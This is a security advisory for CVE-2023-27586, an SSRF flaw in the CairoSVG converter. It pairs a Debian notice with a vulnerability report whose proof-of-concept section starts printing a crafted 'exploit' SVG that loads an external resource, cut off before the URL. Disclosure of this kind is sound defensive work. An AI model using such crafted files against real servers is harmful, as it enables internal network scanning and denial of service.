CVE-2023-27586: Release 2.7.0 · Kozea/CairoSVG

Debian Linux Security Advisory 5382-1 - It was reported that cairosvg, a SVG converter based on Cairo, can send requests to external hosts when processing specially crafted SVG files with external file resource loading. An attacker can take advantage of this flaw to perform a server-side request forgery or denial of service. Fetching of external files is disabled by default with this update.

# SSRF vulnerability ## Summary When CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts. ## Operating system, version and so on Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9 ## Tested CairoSVG version 2.6.0 ## Details A specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization's internal resources or a DDOS attack on external resources. It looks like this bug can affect websites and cause request forgery on the server. ## PoC 1. Generating malicious svg file: 1.1 CairoSVG_exploit.svg: ```svg <?xml version="1.0" standalone="yes"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <image height="200" width="200" xlink:href...